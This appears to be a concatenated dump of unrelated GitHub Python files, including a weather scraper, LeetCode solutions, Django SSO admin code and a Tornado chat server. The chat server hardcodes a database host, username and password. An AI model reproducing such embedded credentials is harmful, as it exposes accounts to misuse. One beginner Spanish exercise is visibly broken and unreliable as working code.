addressToScrapeFrom )\nsoup = BeautifulSoup ( page.content, 'html.parser' )\n\n# get the full source code of the page - uncomment next line\n# print(soup)\n\n# get all a tags (links) - uncomment next line\n# print(soup.find_all('a')) \n\nweek = 
soup.find( id='seven-day-forecast-container' )\n\n# get the html inside of the element with id='seven-day-forecast-container' - uncomment next line\n# print( week )\n\nitems = week.find_all( class_='tombstone-container' )\n\n# get all items - uncomment next line\n# print( items )\n\n# get specific item - uncomment next line\n# print( items[0] )\n\n# print( items[0].find( class_='period-name' ).get_text() )\n# print( items[0].find( class_='short-desc' ).get_text() )\n# print( items[0].find( class_='temp' ).get_text() )\n\n# extract all period-names from items and put them in a list - uncomment next line\nperiod_names = [ item.find(class_='period-name').get_text() for item in items ]\nshort_descriptions = [ item.find(class_='short-desc').get_text() for item in items ]\ntemperatures = [ item.find(class_='temp').get_text() for item in items ]\n\n# print( period_names ) - uncomment next line\n# print( short_descriptions ) - uncomment next line\n# print( temperatures ) - uncomment next line\n\nweather_stuff = pd.DataFrame({ \n 'period': period_names,\n 'short_descriptions': short_descriptions,\n 'temperatures': temperatures, \n})\n\nprint( weather_stuff )\n\n# export to csv\nweather_stuff.to_csv( 'weather.csv' )","repo_name":"guergana/scraping-beautiful-soup","sub_path":"01-weather/scraping-weather.py","file_name":"scraping-weather.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21567608390","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n# recursively 递归\nclass Solution(object):\n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n return self.isEqual(root, root)\n \n def isEqual(self, left, right):\n if left == right == None:\n return True\n elif left == None or right == None:\n return False \n return left.val == right.val and self.isEqual(left.left, right.right) and self.isEqual(left.right, right.left)\n\n# iteratively 迭代\nclass Solution(object):\n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n queue = []\n if root == None:\n return True\n queue.append(root.left)\n queue.append(root.right)\n while queue:\n left = queue.pop(0)\n right = queue.pop(0)\n if left == None and right == None:\n continue\n if left == None or right == None:\n return False\n if left.val != right.val:\n return False\n queue.append(left.left)\n queue.append(right.right)\n queue.append(left.right)\n queue.append(right.left)\n return True\n","repo_name":"bingli8802/leetcode","sub_path":"0101_Symmetric_Tree.py","file_name":"0101_Symmetric_Tree.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30877399800","text":"\nwhile True:\n numero1=int(input('Ingrese un numero'))\n numero2=int(input('Ingrese un numero'))\n if numero1==numero2:\n print('los números son iguales')\n continue\n else:\n if numero1>numero2:\n print (f'El {numero1} es mayor que {numero2}') \n else:\n print (f'El {numero2} es mayor que {numero1}')\n break\n \nresultado=0\nwhile True:\n if numero1>numero2 :\n resultado=numero1-numero2 \n print(f\"el resultado de la resta de {numero1} y {numero2} es {resultado}\")\n else : numero2>numero1\n resultado = numero2 - numero1\n print(f\"el resultado de la resta de {numero1} y {numero2} es 
{resultado}\")\n\n if resultado-numero1:\n while resultado != 0:\n if numero1numero1\n #resultado=resultado-numero2\n #print(f\" la diferencia del resutado es {resultado}\")\n\n # if resultado<=0:\n # break\n","repo_name":"juaness007/pythoncastillo","sub_path":"Tarea1while.py","file_name":"Tarea1while.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40824341833","text":"import itertools\n\nimport jsonschema\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport psutil\nimport six\n\nfrom stackalytics.processor import config\nfrom stackalytics.processor import default_data_processor\nfrom stackalytics.processor import rcs\nfrom stackalytics.processor import record_processor\nfrom stackalytics.processor import runtime_storage\nfrom stackalytics.processor import schema\nfrom stackalytics.processor import utils\nfrom stackalytics.processor import vcs\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\ndef get_pids():\n result = set([])\n for pid in psutil.pids():\n try:\n p = psutil.Process(pid)\n name = p.name()\n if name == 'uwsgi':\n LOG.debug('Found uwsgi process, pid: %s', pid)\n result.add(pid)\n except Exception as e:\n LOG.debug('Exception while iterating process list: %s', e)\n pass\n\n return result\n\n\ndef update_pids(runtime_storage):\n pids = get_pids()\n if not pids:\n return\n runtime_storage.active_pids(pids)\n\n\ndef _merge_commits(original, new):\n if new['branches'] < original['branches']:\n return False\n else:\n original['branches'] |= new['branches']\n return True\n\n\ndef _record_typer(record_iterator, record_type):\n for record in record_iterator:\n record['record_type'] = record_type\n yield record\n\n\ndef _get_repo_branches(repo):\n return ({repo.get('default_branch', 'master')} |\n set(r['branch'] for r in repo.get('releases', [])\n if 'branch' in r))\n\n\ndef _process_repo_reviews(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst):\n for branch in _get_repo_branches(repo):\n LOG.info('Processing reviews for repo: %s, branch: %s',\n repo['uri'], branch)\n\n quoted_uri = six.moves.urllib.parse.quote_plus(repo['uri'])\n rcs_key = 'rcs:%s:%s' % (quoted_uri, branch)\n last_retrieval_time = runtime_storage_inst.get_by_key(rcs_key)\n current_retrieval_time = utils.date_to_timestamp('now')\n\n review_iterator = itertools.chain(\n rcs_inst.log(repo, branch, last_retrieval_time, status='open'),\n rcs_inst.log(repo, branch, last_retrieval_time, status='merged'),\n rcs_inst.log(repo, branch, last_retrieval_time, status='abandoned',\n grab_comments=True), )\n\n review_iterator_typed = _record_typer(review_iterator, 'review')\n processed_review_iterator = record_processor_inst.process(\n review_iterator_typed)\n\n runtime_storage_inst.set_records(processed_review_iterator,\n utils.merge_records)\n runtime_storage_inst.set_by_key(rcs_key, current_retrieval_time)\n\n\ndef _process_repo_vcs(repo, runtime_storage_inst, record_processor_inst):\n vcs_inst = vcs.get_vcs(repo, CONF.sources_root)\n vcs_inst.fetch()\n\n for branch in _get_repo_branches(repo):\n LOG.info('Processing commits in repo: %s, branch: %s',\n repo['uri'], branch)\n\n quoted_uri = six.moves.urllib.parse.quote_plus(repo['uri'])\n vcs_key = 'vcs:%s:%s' % (quoted_uri, branch)\n last_id = runtime_storage_inst.get_by_key(vcs_key)\n\n commit_iterator = vcs_inst.log(branch, last_id)\n commit_iterator_typed = _record_typer(commit_iterator, 'commit')\n processed_commit_iterator = 
record_processor_inst.process(\n commit_iterator_typed)\n runtime_storage_inst.set_records(\n processed_commit_iterator, _merge_commits)\n\n last_id = vcs_inst.get_last_id(branch)\n runtime_storage_inst.set_by_key(vcs_key, last_id)\n\n\ndef _process_repo(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst):\n LOG.info('Processing repo: %s', repo['uri'])\n\n _process_repo_vcs(repo, runtime_storage_inst, record_processor_inst)\n\n if 'has_gerrit' in repo:\n _process_repo_reviews(repo, runtime_storage_inst,\n record_processor_inst, rcs_inst)\n\n\ndef _post_process_records(record_processor_inst, repos):\n LOG.debug('Build release index')\n release_index = {}\n for repo in repos:\n vcs_inst = vcs.get_vcs(repo, CONF.sources_root)\n release_index.update(vcs_inst.fetch())\n\n LOG.debug('Post-process all records')\n record_processor_inst.post_processing(release_index)\n\n\ndef process(runtime_storage_inst, record_processor_inst):\n repos = utils.load_repos(runtime_storage_inst)\n\n rcs_inst = rcs.get_rcs(CONF.review_uri)\n# rcs_inst.setup(key_filename=CONF.ssh_key_filename,\n# username=CONF.ssh_username,\n# gerrit_retry=CONF.gerrit_retry)\n\n for repo in repos:\n _process_repo(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst)\n\n rcs_inst.close()\n\n _post_process_records(record_processor_inst, repos)\n\n\ndef process_project_list(runtime_storage_inst):\n module_groups = runtime_storage_inst.get_by_key('module_groups') or {}\n\n # register modules as module groups\n repos = runtime_storage_inst.get_by_key('repos') or []\n for repo in repos:\n module = repo['module'].lower()\n module_groups[module] = utils.make_module_group(module, tag='module')\n\n # register module 'unknown' - used for emails not mapped to any module\n module_groups['unknown'] = utils.make_module_group('unknown', tag='module')\n\n runtime_storage_inst.set_by_key('module_groups', module_groups)\n\n\ndef main():\n utils.init_config_and_logging(config.CONNECTION_OPTS +\n config.PROCESSOR_OPTS)\n\n runtime_storage_inst = runtime_storage.get_runtime_storage(\n CONF.runtime_storage_uri)\n\n default_data = utils.read_json_from_uri(CONF.default_data_uri)\n if not default_data:\n LOG.critical('Unable to load default data')\n return not 0\n\n try:\n jsonschema.validate(default_data, schema.default_data)\n except jsonschema.ValidationError as e:\n LOG.critical('The default data is invalid: %s' % e)\n return not 0\n\n default_data_processor.process(runtime_storage_inst,\n default_data)\n\n process_project_list(runtime_storage_inst)\n\n update_pids(runtime_storage_inst)\n\n record_processor_inst = record_processor.RecordProcessor(\n runtime_storage_inst)\n\n process(runtime_storage_inst, record_processor_inst)\n\n runtime_storage_inst.set_by_key('runtime_storage_update_time',\n utils.date_to_timestamp('now'))\n LOG.info('stackalytics-processor succeeded.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dianaclarke/lit","sub_path":"stackalytics/processor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38876682423","text":"class fruteria:\n comercio = {\"platano\": 1.35, \"Manzana\": 0.80, \"Pera\": 0.85, \"Naranja\": 0.70}\n fruta = ''\n kilos = 0\n\n def __init__(self, f, k):\n self.fruta = f\n self.kilos = k\n\n def comprarFruta(self):\n while True:\n if self.fruta in self.comercio:\n print(\"su precio es de :\", self.comercio[self.fruta] * self.kilos)\n break\n else:\n 
print(\"Lo sentimos mucho no tenemos esa fruta\\nNuestra fruta:\")\n for c,v in self.comercio.items():\n print(c)\n\n self.fruta = input(\"que fruta desea: \")\n self.kilos = float(input(\"¿cuantos kilos: \"))\n\n for c, v in self.comercio.items():\n if self.fruta in c:\n print(\"su fruta: \", c, ' su precio ', v * self.kilos)\n break\n else:\n pass","repo_name":"fernado1981/python_","sub_path":"POO/Fruteria/fruteria.py","file_name":"fruteria.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74603512421","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nfrom ctypes import *\n\nclass InputInfo(Structure):\n _fields_ = [('computer_player_id', c_byte),\n ('starting_player_id', c_byte),\n ('played_cards', c_byte * 48),\n ('played_cards_len', c_byte),\n ('computer_player_hand', c_byte * 12),\n ('computer_player_hand_len', c_byte)]\n\ncardnames = ('cn','ck','ct','ca','sn','sk','st','sa','hn','hk','ha','dn','dk','dt','da',\n 'dj','hj','sj','cj','dq','hq','sq','cq','ht')\nconvertd = {k : i*2 for i, k in enumerate(cardnames)}\nrconvertd = { i*2 : k for i, k in enumerate(cardnames)}\nrconvertd.update( {i*2+1 : k for i,k in enumerate(cardnames)})\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-l','--lib', default='./libdoko.so',\n help='path to the libdoko shared library')\n parser.add_argument('-j','--json', type=str,\n help='input json string')\n args = parser.parse_args()\n\n libdoko = CDLL(args.lib)\n GetBestCard = libdoko.GetBestCard\n GetBestCard.argtypes = [POINTER(InputInfo)]\n GetBestCard.restype = c_byte\n\n line = args.json\n # for line in map(str.strip, sys.stdin):\n if line:\n try:\n json_info = json.loads(line)\n input_info = InputInfo()\n input_info.computer_player_id = int(json_info['computer_player_id'])\n input_info.starting_player_id = int(json_info['starting_player_id'])\n input_info.played_cards_len = len(list(json_info['played_cards']))\n for i, c in enumerate(list(json_info['played_cards'])):\n if convertd[c] in input_info.played_cards[:i]:\n input_info.played_cards[i] = convertd[c] + 1\n else:\n input_info.played_cards[i] = convertd[c]\n input_info.computer_player_hand_len = len(list(json_info['computer_player_hand']))\n for i, c in enumerate(list(json_info['computer_player_hand'])):\n if ( convertd[c] in input_info.computer_player_hand[:i] or\n convertd[c] in input_info.played_cards[:input_info.played_cards_len] ):\n input_info.computer_player_hand[i] = convertd[c] + 1\n else:\n input_info.computer_player_hand[i] = convertd[c]\n\n res = GetBestCard(pointer(input_info))\n result_info = json.dumps({'best_card': rconvertd[res]})\n print(result_info)\n except:\n print(json.dumps('error'))\n\n","repo_name":"jakob-stark/doko_mc_ai","sub_path":"utils/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"9213164602","text":"from minimal_ssz import hash_tree_root\n\n\ndef jsonize(value, typ, include_hash_tree_roots=False):\n if isinstance(typ, str) and typ[:4] == 'uint':\n return value\n elif typ == 'bool':\n assert value in (True, False)\n return value\n elif isinstance(typ, list):\n return [jsonize(element, typ[0], include_hash_tree_roots) for element in value]\n elif isinstance(typ, str) and typ[:4] == 'byte':\n return '0x' + value.hex()\n elif hasattr(typ, 'fields'):\n ret = {}\n 
for field, subtype in typ.fields.items():\n ret[field] = jsonize(getattr(value, field), subtype, include_hash_tree_roots)\n if include_hash_tree_roots:\n ret[field + \"_hash_tree_root\"] = '0x' + hash_tree_root(getattr(value, field), subtype).hex()\n if include_hash_tree_roots:\n ret[\"hash_tree_root\"] = '0x' + hash_tree_root(value, typ).hex()\n return ret\n else:\n print(value, typ)\n raise Exception(\"Type not recognized\")\n\n\ndef dejsonize(json, typ):\n if isinstance(typ, str) and typ[:4] == 'uint':\n return json\n elif typ == 'bool':\n assert json in (True, False)\n return json\n elif isinstance(typ, list):\n return [dejsonize(element, typ[0]) for element in json]\n elif isinstance(typ, str) and typ[:4] == 'byte':\n return bytes.fromhex(json[2:])\n elif hasattr(typ, 'fields'):\n temp = {}\n for field, subtype in typ.fields.items():\n temp[field] = dejsonize(json[field], subtype)\n if field + \"_hash_tree_root\" in json:\n assert(json[field + \"_hash_tree_root\"][2:] == \n hash_tree_root(temp[field], subtype).hex())\n ret = typ(**temp)\n if \"hash_tree_root\" in json:\n assert(json[\"hash_tree_root\"][2:] == \n hash_tree_root(ret, typ).hex())\n return ret\n else:\n print(json, typ)\n raise Exception(\"Type not recognized\")\n","repo_name":"ethereum/research","sub_path":"spec_pythonizer/jsonize.py","file_name":"jsonize.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":1683,"dataset":"github-code","pt":"35"} +{"seq_id":"26071195630","text":"from function import HeatMap\ndef getAllPlots(subsystemAtom):\n print(\"+++++++ PLOT GENERATING FOR %s +++++++\"%subsystemAtom)\n subsystem = subsystemAtom[0]\n side = subsystemAtom[1]\n folder = \"/afs/crc.nd.edu/user/h/hbhattar/Hemanta/metals/ThermalConductivity/EqulibratedSystem/\"\n #fileOut = \"%s_%s_HHAngle.eps\"%(subsystem,side)\n fileOut = \"%s_merged_HHAngle.eps\"%(subsystem)\n tailSubsystem = \"\" \n system2 = \"%s_Dynamics_TimeAdjusted\"%(subsystem)\n n2=4\n heatMap = HeatMap.HeatMap(folder)\n heatMap.set_numbers(n2)\n heatMap.set_extension(\"HHAngle\")\n heatMap.set_initial(0)\n #heatMap.set_subsystem(\"_%s_merged_smooth\"%(side))\n heatMap.set_subsystem(\"_Single_merged_smooth\")\n heatMap.set_system(system2)\n heatMap.set_deltaZ(3)\n ref = 0.005\n dev = 0.001\n heatMap.set_xlabel(\"Z\")\n heatMap.set_ylabel(\"$S_1(\\\\theta_{HH})$\")\n heatMap.set_colormaxmin(ref - dev,ref + dev)\n heatMap.set_fileOut(fileOut)\n heatMap.set_freqThreshold(1)\n heatMap.HeatMapMatrix()\n heatMap.heatMapPlot1()\n\n\n \n return subsystem\n \n\n\ndef main(): \n subsystemList=[\"MNWN\",\"MFWN\",\"MNWN_TIP4P\", \"MFWN_TIP4P\", \"MNWF\", \"MFWF\"]\n side = [\"L\", \"R\"]\n subsystemList = [ [syst, lr] for syst in subsystemList for lr in side ]\n list(map(getAllPlots,subsystemList))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Hemanta-Bhattarai/Research","sub_path":"pythonFiles/HHAngle.py","file_name":"HHAngle.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16042297195","text":"# Given a string s containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n#\n# An input string is valid if:\n#\n# Open brackets must be closed by the same type of brackets.\n# Open brackets must be closed in the correct order.\n#\n#\n# Example 1:\n#\n# Input: s = \"()\"\n# Output: true\n# Example 2:\n#\n# Input: s = \"()[]{}\"\n# Output: true\n# Example 3:\n#\n# 
Input: s = \"(]\"\n# Output: false\n# Example 4:\n#\n# Input: s = \"([)]\"\n# Output: false\n# Example 5:\n#\n# Input: s = \"{[]}\"\n# Output: true\n#\n#\n# Constraints:\n#\n# 1 <= s.length <= 10^4\n# s consists of parentheses only '()[]{}'.\n\n\nclass Solution:\n def isValid(self, s: str) -> bool:\n # using stack\n stack = []\n pairs = {'(': ')', '[': ']', '{': '}'}\n for c in s:\n if c in pairs:\n stack.append(c)\n elif len(stack) > 0 and c == pairs[stack[-1]]:\n stack.pop()\n else:\n return False\n return len(stack) == 0\n\n\nprint(list(map(Solution().isValid, [\"()\", \"(]\", \"{[]}\"])))\n","repo_name":"graysonliu/leetcode","sub_path":"0020_valid_parentheses.py","file_name":"0020_valid_parentheses.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15701934269","text":"from django.contrib import admin\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.urls import reverse_lazy\nfrom django.utils.safestring import mark_safe\nfrom django.contrib import admin\nfrom django.forms import ModelForm, ModelMultipleChoiceField\nfrom django.contrib.auth.admin import UserAdmin, GroupAdmin\nfrom django.contrib.admin.widgets import FilteredSelectMultiple\n\nfrom ..tasks import refresh_keycloak\nfrom ..models import SSOConfig, SSOUserProfile\nfrom shared.models import config\n\n\ndef refresh_realm(modeladmin, request, queryset):\n result = refresh_keycloak.delay()\n modeladmin.message_user(\n request,\n mark_safe(\"Tâche {} ajoutée à la file ({})\".format(\n reverse_lazy('admin:django_celery_results_taskresult_changelist'), result.task_id, result.status))\n )\n\n\nrefresh_realm.short_description = \"Actualiser la configuration Keycloak\"\n\n\nclass SSOConfigAdmin(admin.ModelAdmin):\n model = SSOConfig\n fields = ['well_known_oidc', 'public_key']\n readonly_fields = ['well_known_oidc', 'public_key']\n actions = [refresh_realm]\n\n def has_add_permission(self, request):\n # check if generally has add permission\n if SSOConfig.objects.exists():\n return False\n return super().has_add_permission(request)\n\n\nclass SSOProfileInline(admin.StackedInline):\n model = SSOUserProfile\n readonly_fields = ['sub', 'access_token', 'expires_before',\n 'refresh_token', 'refresh_expires_before']\n\n\nclass CustomUserAdmin(UserAdmin):\n inlines = [SSOProfileInline]\n list_display = ['username', 'email', 'get_groups',\n 'is_staff', 'is_sso', 'get_notifications', 'last_login']\n search_fields = ['username', 'email', 'groups__name']\n\n def get_groups(self, obj):\n return \", \".join([g.name for g in obj.groups.all()])\n\n get_groups.short_description = \"Groupes\"\n\n def get_notifications(self, obj):\n # notifications are always disabled for superusers\n if obj.is_superuser:\n return \"\"\n result = []\n if obj.has_perm('shared.be_notified_on_fne'):\n result.append(\"FNE\")\n if obj.has_perm('shared.be_notified_on_simi'):\n result.append(\"Similitudes\")\n if obj.has_perm('shared.be_notified_on_brouillage'):\n result.append(\"Brouillage\")\n return ', '.join(result)\n\n get_notifications.short_description = \"Notifications\"\n\n def is_sso(self, obj):\n try:\n return obj.sso_profile.sub is not None\n except:\n return False\n is_sso.boolean = True\n is_sso.short_description = \"SSO\"\n\n\nclass GroupAdminForm(ModelForm):\n # edit user set from group admin\n class Meta:\n model = Group\n exclude = []\n\n # Add the 
users field.\n users = ModelMultipleChoiceField(\n queryset=get_user_model().objects.all(),\n required=False,\n # Use the pretty 'filter_horizontal widget'.\n widget=FilteredSelectMultiple('users', False)\n )\n\n def __init__(self, *args, **kwargs):\n # Do the normal form initialisation.\n super(GroupAdminForm, self).__init__(*args, **kwargs)\n # If it is an existing group (saved objects have a pk).\n if self.instance.pk:\n # Populate the users field with the current Group users.\n self.fields['users'].initial = self.instance.user_set.all()\n\n def save_m2m(self):\n # Add the users to the Group.\n self.instance.user_set.set(self.cleaned_data['users'])\n\n def save(self, *args, **kwargs):\n # Default save\n instance = super(GroupAdminForm, self).save()\n # Save many-to-many data\n self.save_m2m()\n return instance\n\n\nclass CustomGroupAdmin(GroupAdmin):\n list_display = [\n 'name', 'is_validator', 'is_investigator', 'has_all_access'\n ]\n form = GroupAdminForm\n\n def is_validator(self, obj):\n return config.group_is_validator(obj)\n\n is_validator.short_description = \"Validateur\"\n is_validator.boolean = True\n is_validator.help_text = \"Valide les fiches avant traitement (ex : Chef de Salle)\"\n\n def has_all_access(self, obj):\n return config.group_has_all_access(obj)\n\n has_all_access.short_description = \"Accès complet\"\n has_all_access.boolean = True\n has_all_access.help_text = \"A accès à toutes les fiches, mêmes celles en traitement par un autre groupe (ex : subdivision QSS)\"\n\n def is_investigator(self, obj):\n return config.group_is_investigator(obj)\n\n is_investigator.short_description = \"Investigateur\"\n is_investigator.boolean = True\n is_investigator.help_text = \"A accès aux fiches qui lui sont attribuées pour traitement (ex : subdivision hors QSS)\"\n\n\nadmin.site.register(SSOConfig, SSOConfigAdmin)\nadmin.site.unregister(get_user_model())\nadmin.site.register(get_user_model(), CustomUserAdmin)\nadmin.site.unregister(Group)\nadmin.site.register(Group, CustomGroupAdmin)\nadmin.site.login_template = \"sso/login.html\"\n","repo_name":"Gribou/Diapason-forms","sub_path":"api/sso/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14685307863","text":"from ckip_transformers.nlp import CkipWordSegmenter, CkipPosTagger, CkipNerChunker\nimport pandas as pd\n\n\ndef pack_ws_pos_sentece(sentence_ws, sentence_pos):\n assert len(sentence_ws) == len(sentence_pos)\n res = []\n for word_ws, word_pos in zip(sentence_ws, sentence_pos):\n if(word_pos == 'Na'):\n res.append(f\"{word_ws} \")\n return \"\\u3000\".join(res)\n\n\n# Show results(contain NER)\n# for sentence, sentence_ws, sentence_pos, sentence_ner in zip(text, ws, pos, ner):\n# print(sentence)\n# print(pack_ws_pos_sentece(sentence_ws, sentence_pos))\n# for entity in sentence_ner:\n# print(entity)\n# print()\nif __name__ == \"__main__\":\n # data = pd.read_csv(r\"dataset\\food_positve.csv\")\n # text_list = [i for i in data['caption']]\n # print(text_list)\n # Initialize drivers\n ws_driver = CkipWordSegmenter(level=3)\n pos_driver = CkipPosTagger(level=3)\n ner_driver = CkipNerChunker(level=1)\n\n text = [\"擔仔麵的味道很純厚,讓人想一直吃下去!\"]\n ws = ws_driver(text)\n pos = pos_driver(ws)\n ner = ner_driver(text)\n for sentence, sentence_ws, sentence_pos, sentence_ner in zip(text, ws, pos, ner):\n print(sentence)\n print(pack_ws_pos_sentece(sentence_ws, sentence_pos))\n for entity in 
sentence_ner:\n            print(entity)\n        print()\n","repo_name":"godspeedhuang/Food_Recommendation_Linebot","sub_path":"recognize_food_n.py","file_name":"recognize_food_n.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28114105404","text":"# Source Taken from:\n# https://realpython.com/python-logging/\n# https://stackoverflow.com/questions/11232230/logging-to-two-files-with-different-settings\n\nimport logging\n\n\ndef setup_logger(name, log_file, level=logging.INFO):\n    # Create a custom logger\n    logger = logging.getLogger(name)\n\n    # Create handlers\n    c_handler = logging.StreamHandler()\n    f_handler = logging.FileHandler(log_file)\n    c_handler.setLevel(level)\n    f_handler.setLevel(level)\n\n    # Create formatters and add it to handlers\n    c_format = logging.Formatter('[%(levelname)s] %(message)s')\n    f_format = logging.Formatter('%(asctime)s - %(name)s - [%(levelname)s] %(message)s')\n    c_handler.setFormatter(c_format)\n    f_handler.setFormatter(f_format)\n\n    # Add handlers to the logger\n    logger.addHandler(c_handler)\n    logger.addHandler(f_handler)\n\n    return logger\n\n\nlog = setup_logger('default', 'file.log', logging.DEBUG)\n","repo_name":"WckdAwe/Uncuffed","sub_path":"Uncuffed/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"23876395074","text":"import sys\r\nimport copy\r\ninput = sys.stdin.readline\r\nfrom collections import deque\r\nfrom itertools import permutations\r\nfrom sys import setrecursionlimit\r\nsetrecursionlimit(10**8)\r\n\r\n# exhaustive BFS over every possible button press\r\n# \r\n\r\ndef sol() :\r\n    F,S,G,U,D = list(map(int,input().split()))\r\n    # travel from floor S to floor G\r\n    # maximum height: floor F\r\n    visited = {}\r\n    def BFS():\r\n        visited[S] = 1\r\n        q = deque()\r\n        q.append((S,0))\r\n        while q :\r\n            currFloor,count = q.popleft()\r\n            if currFloor == G :\r\n                return count\r\n            for nextFloor in [currFloor+U,currFloor-D]:\r\n                if nextFloor > F or nextFloor <= 0 : continue\r\n                if visited.get(nextFloor) : continue\r\n                visited[nextFloor] = 1\r\n                q.append((nextFloor,count+1))\r\n        return 'use the stairs'\r\n    return BFS()\r\nprint(sol())\r\n","repo_name":"wooryjoon/algorithms","sub_path":"백준/Silver/5014. 
스타트링크/스타트링크.py","file_name":"스타트링크.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22096965421","text":"import logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport torndb\nimport os.path\nimport uuid\nimport urllib2\nimport json\nfrom datetime import datetime\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=3000, help=\"run on the given port\", type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/chatsocket\", ChatSocketHandler),\n ]\n\n settings = dict(\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n )\n\n tornado.web.Application.__init__(self, handlers, **settings)\n\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = set()\n cache = {'users':[], 'messages':[]}\n cache_size = 10000\n\n if len(cache['messages']) == 0:\n db = torndb.Connection(\"betoncombat.mysql.pythonanywhere-services.com\", \"betoncombat$boc\", user ='betoncombat', password='makemoney')\n for db_message in db.query(\"SELECT * FROM chat_chatmessage LEFT JOIN auth_user on chat_chatmessage.user_id = auth_user.id ORDER BY timestamp LIMIT 50 \"):\n message = {\n \"id\": str(db_message.id),\n \"body\": db_message.text,\n \"username\": db_message.username,\n \"timestamp\": db_message.timestamp.isoformat()\n }\n\n\n cache['messages'].insert(len(cache['messages']), message)\n\n def check_origin(self, origin):\n return True\n\n def allow_draft76(self):\n # for iOS 5.0 Safari\n return True\n\n def open(self):\n user = self.get_user()\n if user:\n self.user = self.get_user()\n ChatSocketHandler.waiters.add(self)\n\n def on_close(self):\n try:\n self.cache['users'].remove(self.user)\n self.cache['users'].sort()\n self.update_users()\n ChatSocketHandler.waiters.remove(self)\n except:\n ChatSocketHandler.waiters.remove(self)\n\n\n def get_user(self):\n #get session key\n cookies = self.request.headers['Cookie'].split('; ')\n sessionid = None\n for cookie in cookies:\n if \"sessionid\" in cookie:\n sessionid = cookie.split(\"=\")[1]\n if sessionid:\n #post request to server\n url = self.request.headers[\"Origin\"]+\"/chat/auth/\"\n req = urllib2.Request(url)\n response = urllib2.urlopen(req, \"sessionid=\"+sessionid)\n result = response.read()\n result = json.loads(result)\n return result['user']\n return None\n\n @classmethod\n def update_message_cache(cls, chat):\n cls.cache['messages'].append(chat)\n if len(cls.cache['messages']) > cls.cache_size:\n cls.cache['messages'] = cls.cache['messages'][cls.cache_size:]\n\n\n @classmethod\n def send_updates(cls, chat):\n logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(chat)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n\n def update_users(self):\n users = {\"type\": \"users\"}\n users['users'] = ChatSocketHandler.cache['users']\n for waiter in self.waiters:\n try:\n waiter.write_message(users)\n except:\n pass\n\n\n def on_message(self, message):\n logging.info(\"got message %r\", message)\n parsed = tornado.escape.json_decode(message)\n if parsed['type'] == \"auth\":\n #update users\n if parsed['user'] not in self.cache['users']:\n 
